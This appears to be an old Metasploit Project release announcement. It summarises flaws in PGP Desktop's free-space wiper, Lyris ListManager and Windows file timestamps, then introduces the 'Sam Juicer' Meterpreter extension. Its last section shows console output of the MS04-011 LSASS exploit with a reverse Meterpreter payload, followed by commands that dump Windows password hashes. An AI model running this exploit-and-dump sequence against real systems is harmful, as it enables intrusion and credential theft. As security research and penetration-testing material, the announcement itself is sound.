The Metasploit Project has released three new vulnerability sets and a password dumping extension to the Meterpreter payload. Enjoy! -HD [ PGP Desktop Wipe Free Space Flaw ] PGP Desktop includes a Wipe Free Space utility that claims to eliminate data in all the free space on your hard drive including the the little areas after the end of existing files which may still have old data left behind. In short, the utility claims to wipe file slack space, the unused space in a disk cluster. The software does not work as advertised. It does not clean slack space. - http://metasploit.com/research/vulns/pgp_slackspace/ [ Lyris ListManager Multiple Flaws ] The Lyris ListManager software is vulnerable to numerous SQL injection, source code dislosure, and authentication bypass flaws. The ListManager software runs on Linux, Solaris, and Windows and can be configured to use one of the following database backends: PostgreSQL, Oracle, and MSSQL/MSDE. These flaws can be used to gain complete access to the ListManager data and often the host server itself. - http://metasploit.com/research/vulns/lyris_listmanager/ [ Windows File Time Stamp Display Flaw ] Windows file time stamps can be set to extremely low values via the NtSetInformationFile() system call. The Windows API does not properly translate the low 64-bit time values stored on disk into human readable format, and displays no information instead. Although this is not a security vulnerability in itself, it adversely affects third-party applications that rely upon the Windows API to perform the translation. - http://metasploit.com/research/vulns/windows_timestamp/ [ Sam Juicer ] A new extension has been added to the Meterpreter uber-payload in the Metasploit Framework. This extension allows you to dump the local Windows password hashes from a Meterpreter shell. The password dump is accomplished without writing any files to disk, as opposed to any version of pwdump available today. The Sam Juicer extension can be obtained via 'msfupdate' or by downloading the latest snapshot of v2.5 of the Metasploit Framework. After successfully exploiting a system with one of the 'meterpreter' payloads, run the following commands to load the extension and dump the password hashes: msf lsass_ms04_011(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Windows 2000 target [*] Sending request... [*] Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124 [*] Sending Stage (2834 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> << load the Sam extension with the 'use' command >> meterpreter> use -m Sam loadlib: Loading library from 'ext551353.dll' on the remote machine. loadlib: success. << use the gethashes command to dump the local password hashes >> meterpreter> gethashes Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4:cp6wan5tahdibs94e89e2ffb49f307fc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [ snip ]
